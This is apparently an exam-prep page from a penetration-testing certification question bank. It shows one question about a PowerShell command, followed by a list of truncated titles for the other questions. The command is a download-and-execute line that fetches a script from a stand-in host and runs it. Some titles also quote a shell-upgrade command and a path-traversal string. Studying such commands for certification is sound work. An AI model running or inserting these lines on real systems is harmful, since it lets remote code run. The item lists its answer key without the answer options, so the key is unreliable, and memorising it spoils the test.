Join the discussion
Question 201/221
Consider the following PowerShell command:
powershell.exe
IEX (New-Object Net.Webclient).downloadstring(http://site/
script.ps1");Invoke-Cmdlet
Which of the following BEST describes the actions performed this command?
powershell.exe
IEX (New-Object Net.Webclient).downloadstring(http://site/
script.ps1");Invoke-Cmdlet
Which of the following BEST describes the actions performed this command?
Correct Answer: A
Add Comments
- Other Question (221q)
- Q1. During a web application assessment, a penetration tester discovers that arbitrary command...
- Q2. A security consultant is trying to attack a device with a previously identified user accou...
- Q3. Place each of the following passwords in order of complexity from least complex (1) to mos...
- Q4. A penetration tester is checking a script to determine why some basic math errors are pers...
- Q5. A penetration tester reviews the scan results of a web application. Which of the following...
- Q6. A penetration tester has successfully exploited a Windows host with low privileges and fou...
- Q7. Given the following script: (Exhibit) Which of the following BEST describes the purpose of...
- Q8. A company has engaged a penetration tester to perform an assessment for an application tha...
- Q9. A senior employee received a suspicious email from another executive requesting an urgent ...
- Q10. A penetration tester is performing a wireless penetration test. Which of the following are...
- Q11. A consultant is attempting to harvest credentials from unsecure network protocols in use b...
- Q12. A penetration tester is connected to a client's local network and wants to passively ident...
- Q13. After successfully enumerating users on an Active Directory domain controller using enum4l...
- Q14. Which of the following is the purpose of an NDA?...
- Q15. Place each of the following passwords in order of complexity from least complex (1) to mos...
- Q16. Given the following: http://example.com/download.php?id-.../.../.../etc/passwd Which of th...
- Q17. Which of the following situations would cause a penetration tester to communicate with a s...
- Q18. A penetration tester wants to check manually if a "ghost" vulnerability exists in a system...
- Q19. A MITM attack is being planned. The first step is to get information flowing through a con...
- Q20. A client requests that a penetration tester emulate a help desk technician who was recentl...
- Q21. Which of the following CPU registers does the penetration tester need to overwrite in orde...
- Q22. A penetration tester is reviewing the following output from a wireless sniffer: (Exhibit) ...
- Q23. When performing active information reconnaissance, which of the following should be tested...
- Q24. Click the exhibit button. (Exhibit) A penetration tester is performing an assessment when ...
- Q25. After successfully enumerating users on an Active Directory domain controller using enum4l...
- Q26. A penetration tester has gained physical access to a facility and connected directly into ...
- Q27. During an internal network penetration test the tester is able to compromise a Windows sys...
- Q28. Given the following script: (Exhibit) Which of the following BEST describes the purpose of...
- Q29. Which of the following situations would cause a penetration tester to communicate with a s...
- Q30. A client requests that a penetration tester emulate a help desk technician who was recentl...
- Q31. A penetration tester is performing a remote scan to determine if the server farm is compli...
- Q32. A penetration tester has performed a pivot to a new Linux device on a different network. T...
- Q33. A penetration tester is reviewing the following output from a wireless sniffer: (Exhibit) ...
- Q34. A penetration tester runs the following from a compromised box 'python -c -import pty;Pty....
- Q35. While engaging clients for a penetration test from highly regulated industries, which of t...
- Q36. A penetration tester is able to move laterally throughout a domain with minimal roadblocks...
- Q37. During a penetration test, you gain access to a system with a limited user interface. This...
- Q38. A security consultant is trying to attack a device with a previous identified user account...
- Q39. A penetration tester is required to exploit a WPS implementation weakness. Which of the fo...
- Q40. A penetration tester is reviewing a Zigbee implementation for security issues. Which of th...
- Q41. During a penetration test, you gain access to a system with a limited user interface. This...
- Q42. A penetration testing company was hired to conduct a penetration test against Company A's ...
- Q43. A penetration tester successfully exploits a system, receiving a reverse shell. Which of t...
- Q44. Defining exactly what is to be tested and the results to be generated from the test will h...
- Q45. Black box penetration testing strategy provides the tester with:...
- Q46. A penetration tester discovers Heartbleed vulnerabilities in a target network Which of the...
- Q47. Place each of the following passwords in order of complexity from least complex (1) to mos...
- Q48. While monitoring WAF logs, a security analyst discovers a successful attack against the fo...
- Q49. A penetration tester has been asked to conduct OS fingerprinting with Nmap using a company...
- Q50. Which of the following is the BEST initial attack against an identified FTP server on the ...
- Q51. When performing compliance-based assessments, which of the following is the MOST important...
- Q52. A client gives a penetration tester a /8 network range to scan during a week-long engageme...
- Q53. After gaining initial low-privilege access to a Linux system, a penetration tester identif...
- Q54. After successfully capturing administrator credentials to a remote Windows machine, a pene...
- Q55. A penetration test was performed by an on-staff technicians junior technician. During the ...
- Q56. A penetration tester wants to check manually if a "ghost" vulnerability exists in a system...
- Q57. DRAG DROP Place each of the following passwords in order of complexity from least complex ...
- Q58. A financial institution is asking a penetration tester to determine if collusion capabilit...
- Q59. A penetration tester is performing a code review against a web application Given the follo...
- Q60. A penetration tester found a network with NAC enabled Which of the following commands can ...
- Q61. A penetration tester has gained access to a marketing employee's device. The penetration t...
- Q62. A penetration tester notices that the X-Frame-Optjons header on a web application is not s...
- Q63. Consider the following PowerShell command: powershell.exe IEX (New-Object Net.Webclient).d...
- Q64. During an engagement, a consultant identifies a number of areas that need further investig...
- Q65. Click the exhibit button. (Exhibit) Given the Nikto vulnerability scan output shown in the...
- Q66. Which of the following BEST protects against a rainbow table attack? D18912E1457D5D1DDCBD4...
- Q67. A penetration tester is preparing for an assessment of a web server's security, which is u...
- Q68. A consultant is attempting to harvest credentials from unsecure network protocols in use b...
- Q69. A company planned for and secured the budget to hire a consultant to perform a web applica...
- Q70. A company hires a penetration tester to determine if there are any vulnerabilities in its ...
- Q71. A tester has determined that null sessions are enabled on a domain controller. Which of th...
- Q72. A penetration tester successfully exploits a Windows host and dumps the hashes Which of th...
- Q73. A system security engineer is preparing to conduct a security assessment of some new appli...
- Q74. Joe, a penetration tester, is asked to assess a company's physical security by gaining acc...
- Q75. A client's systems administrator requests a copy of the report from the penetration tester...
- Q76. A penetration tester is attempting to scan a legacy web application using the scanner's de...
- Q77. A penetration tester wants to check manually if a "ghost" vulnerability exists in a system...
- Q78. After delivering a draft of a penetration test report, a development team has raised conce...
- Q79. A penetration tester has compromised a host. Which of the following would be the correct s...
- Q80. Which of the following would be the BEST for performing passive reconnaissance on a target...
- Q81. When negotiating a penetration testing contract with a prospective client, which of the fo...
- Q82. During an internal network penetration test, a tester recovers the NTLM password hash for ...
- Q83. A client requests that a penetration tester emulate a help desk technician who was recentl...
- Q84. During a web application assessment, a penetration tester discovers that arbitrary command...
- Q85. A penetration tester compromises a system that has unrestricted network over port 443 to a...
- Q86. A company requested a penetration tester review the security of an in-house-developed Andr...
- Q87. A penetration tester executes the following commands: C:\>%userprofile%\jtr.exe This pr...
- Q88. A penetration tester is performing a code review. Which of the following testing technique...
- Q89. The results of a basic compliance scan show a subset of assets on a network. This data dif...
- Q90. A manager calls upon a tester to assist with diagnosing an issue within the following Pyth...
- Q91. A web application scanner reports that a website is susceptible to clickjacking. Which of ...
- Q92. Instructions: Analyze the code segments to determine which sections are needed to complete...
- Q93. A penetration tester is attempting to capture a handshake between a client and an access p...
- Q94. A penetration tester ran an Nmap scan against a target and received the following output: ...
- Q95. Which of the following is the reason why a penetration tester would run the chkconfig --de...
- Q96. In a physical penetration testing scenario, the penetration tester obtains physical access...
- Q97. A client has voiced concern about the number of companies being breached by remote attacke...
- Q98. After successfully capturing administrator credentials to a remote Windows machine, a pene...
- Q99. Click the exhibit button. (Exhibit) Given the Nikto vulnerability, scan output shown in th...
- Q100. A penetration tester has compromised a system and wishes to connect to a port on it from t...
- Q101. A penetration tester has been asked to conduct a penetration test on a REST-based web serv...
- Q102. An organization has requested that a penetration test be performed to determine if it is p...
- Q103. Consider the following PowerShell command: Powershell.exe IEX (New-Object Net.Webclient).d...
- Q104. A penetration test was performed by an on-staff junior technician. During the test, the te...
- Q105. A penetration tester successfully exploits a system, receiving a reverse shell. Which of t...
- Q106. During an internal penetration test, several multicast and broadcast name resolution reque...
- Q107. After performing a security assessment for a firm, the client was found to have been bille...
- Q108. A penetration tester is checking a script to determine why some basic persisting. The expe...
- Q109. While trying to maintain persistence on a Windows system with limited privileges, which of...
- Q110. A penetration tester compromises a system that has unrestricted network over port 443 to a...
- Q111. Click the exhibit button. (Exhibit) A penetration tester is performing an assessment when ...
- Q112. Which of the following tools would a penetration tester leverage to conduct OSINT? (Select...
- Q113. Click the exhibit button. (Exhibit) Given the Nikto vulnerability scan output shown in the...
- Q114. Click the exhibit button. (Exhibit) A penetration tester is performing an assessment when ...
- Q115. A company decides to remediate issues identified from a third-party penetration test done ...
- Q116. A penetration tester runs the following from a compromised 'python -c ' import pty;pty.spa...
- Q117. After an Nmap NSE scan, a security consultant is seeing inconsistent results while scannin...
- Q118. A penetration tester discovers an anonymous FTP server that is sharing the C:\drive. Which...
- Q119. Which of the following CPU register does the penetration tester need to overwrite in order...
- Q120. A recently concluded penetration test revealed that a legacy web application is vulnerable...
- Q121. Place each of the following passwords in order of complexity from least complex (1) to mos...
- Q122. A penetration tester is performing a black box assessment on a web-based banking applicati...
- Q123. While engaging clients for a penetration test from highly regulated industries, which of t...
- Q124. During testing, a critical vulnerability is discovered on a client's core server. Which of...
- Q125. If a security consultant comes across a password hash that resembles the following b117 52...
- Q126. A security analyst was provided with a detailed penetration report, which was performed ag...
- Q127. Which of the following types of physical security attacks does a mantrap mitigate-?...
- Q128. A company contracted a firm specializing in penetration testing to assess the security of ...
- Q129. A penetration tester has been asked to conduct OS fingering with Nmap using a company-prov...
- Q130. A penetration tester is checking a script to determine why some basic math errors are pers...
- Q131. A penetration tester has successfully exploited an application vulnerability and wants to ...
- Q132. A security guard observes an individual entering the building after scanning a badge. The ...
- Q133. During the exploitation phase of a penetration test, a vulnerability is discovered that al...
- Q134. Which of the following tools would a penetration tester leverage to conduct OSINT? (Select...
- Q135. Which of the following actions BEST matches a script kiddie's threat actor?...
- Q136. A penetration tester is able to move laterally throughout a domain with minimal roadblocks...
- Q137. Joe a penetration tester, was able to exploit a web application behind a firewall He is tr...
- Q138. A penetration tester has performed a vulnerability scan of a specific host that contains a...
- Q139. DRAG DROP During a penetration test, you gain access to a system with a limited user inter...
- Q140. A penetration tester has obtained access to an IP network subnet that contains ICS equipme...
- Q141. A security consultant is trying to attack a device with a previous identified user account...
- Q142. A penetration tester has discovered through automated scanning that a Tomcat server allows...
- Q143. A recently concluded penetration test revealed that a legacy web application is vulnerable...
- Q144. A penetration tester ran the following Nmap scan on a computer: nmap -aV 192.168.1.5 The o...
- Q145. A penetration tester was able to retrieve the initial VPN user domain credentials by phish...
- Q146. A penetration tester has successfully exploited a vulnerability on an organization's authe...
- Q147. A client needs to be PCI compliant and has external-facing web servers. Which of the follo...
- Q148. A penetration tester was able to retrieve the initial VPN user domain credentials by phish...
- Q149. A penetration tester is performing initial intelligence gathering on some remote hosts pri...
- Q150. A penetration tester observes that the content security policy header is missing during a ...
- Q151. A static code analysis report of a web application can be leveraged to identify:...
- Q152. A penetration tester observes that several high numbered ports are listening on a public w...
- Q153. A penetration tester runs the following from a compromised box 'python -c -import pty;Pty....
- Q154. A penetration tester runs the following from a compromised box 'python -c -import pty;Pty....
- Q155. A penetration tester identifies the following findings during an external vulnerability sc...
- Q156. An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends ...
- Q157. Joe, a penetration tester, has received basic account credentials and logged into a Window...
- Q158. A malicious user wants to perform an MITM attach on a computer. The computer network confi...
- Q159. A penetration tester was able to retrieve the initial VPN user domain credentials by phish...
- Q160. A security analyst has uncovered a suspicious request in the logs for a web application. G...
- Q161. A penetration tester successfully exploits a system, receiving a reverse shell. Which of t...
- Q162. Which of the following is an example of a spear phishing attack?...
- Q163. A healthcare organization must abide by local regulations to protect and attest to the pro...
- Q164. During a penetration test a tester Identifies traditional antivirus running on the exploit...
- Q165. Which of the following excerpts would come from a corporate policy?...
- Q166. A penetration tester is connected to a client's local network and wants to passively ident...
- Q167. A financial institution is asking a penetration tester to determine if collusion capabilit...
- Q168. After successfully enumerating users on an Active Directory domain controller using enum4l...
- Q169. A company planned for and secured the budget to hire a consultant to perform a web applica...
- Q170. When considering threat actor scoping prior to an engagement, which of the following chara...
- Q171. A penetration tester is performing a code review. Which of the following testing technique...
- Q172. A company's corporate policies state that employees are able to scan any global network as...
- Q173. A penetration tester is performing a code review. Which of the following testing technique...
- Q174. A client asks a penetration tester to add more addresses to a test currently in progress. ...
- Q175. Which of the following tools is used to perform a credential brute force attack?...
- Q176. A manager calls upon a tester to assist with diagnosing an issue within the following Pyth...
- Q177. Which of the following tools is used to perform a credential brute force attack?...
- Q178. Consumer-based IoT devices are often less secure than systems built for traditional deskto...
- Q179. A vulnerability scan is run against a domain hosing a banking application that accepts con...
- Q180. A penetration tester executes the following commands: (Exhibit) Which of the following is ...
- Q181. A security guard observes an individual entering the building after scanning a badge. The ...
- Q182. Instructions: Analyze the code segments to determine which sections are needed to complete...
- Q183. A penetration tester successfully exploits a Windows host and dumps the hashes Which of th...
- Q184. A company contracted a firm specializing in penetration testing to assess the security of ...
- Q185. A penetration tester is in the process of writing a report that outlines the overall level...
- Q186. In which of the following components is an exploited vulnerability MOST likely to affect m...
- Q187. A penetration tester reviews the scan results of a web application. Which of the following...
- Q188. Click the exhibit button. (Exhibit) Given the Nikto vulnerability, scan output shown in th...
- Q189. A penetration tester wants to target NETBIOS name service. Which of the following is the m...
- Q190. You are a penetration tester running port scans on a server. INSTRUCTIONS Part1: Given the...
- Q191. A technician is reviewing the following report. Given this information, identify which vul...
- Q192. Which of the following CPU registers does the penetration tester need to overwrite in orde...
- Q193. A security consultant finds a folder in "C VProgram Files" that has writable permission fr...
- Q194. A client requests that a penetration tester emulate a help desk technician who was recentl...
- Q195. A penetration tester must assess a web service. Which of the following should the tester r...
- Q196. Joe, a penetration tester, was able to exploit a web application behind a firewall He is t...
- Q197. A penetration tester wants to script out a way to discover all the RPTR records for a rang...
- Q198. During a penetration test, a tester runs a phishing campaign and receives a shell from an ...
- Q199. A penetration tester is perform initial intelligence gathering on some remote hosts prior ...
- Q200. A MITM attack is being planned. The first step is to get information flowing through a con...
- Q201. Consider the following PowerShell command: powershell.exe IEX (New-Object Net.Webclient).d...
- Q202. During an internal network penetration test the tester is able to compromise a Windows sys...
- Q203. In which of the following components is an exploited vulnerability MOST likely to affect m...
- Q204. A penetration tester observes that the content security policy header is missing during a ...
- Q205. When performing compliance-based assessments, which of the following is the MOST important...
- Q206. A penetration tester is performing a black-box test of a client web application, and the s...
- Q207. Performance based You are a penetration Inter reviewing a client's website through a web b...
- Q208. A malicious user wants to perform an MITM attack on a computer. The computer network confi...
- Q209. A security analyst has uncovered a suspicious request in the logs for a web application. G...
- Q210. Which of the following attacks is commonly combined with cross-site scripting for session ...
- Q211. A penetration tester identifies the following findings during an external vulnerability sc...
- Q212. A penetration tester has performed a pivot to a new Linux device on a different network. T...
- Q213. A penetration tester reviews the scan results of a web application. Which of the following...
- Q214. Which of the following situations would cause a penetration tester to communicate with a s...
- Q215. A malicious user wants to perform an MITM attack on a computer. The computer network confi...
- Q216. A penetration tester needs to provide the code used to exploit a DNS server in the final r...
- Q217. A penetration tester ran an Nmap scan against a target and received the following output: ...
- Q218. A security consultant is trying to attack a device with a previously identified user accou...
- Q219. A penetration tester has been hired to perform a penetration test for an organization. Whi...
- Q220. In which of the following scenarios would a tester perform a Kerberoasting attack?...
- Q221. A penetration tester is checking a script to determine why some basic math errors are pers...
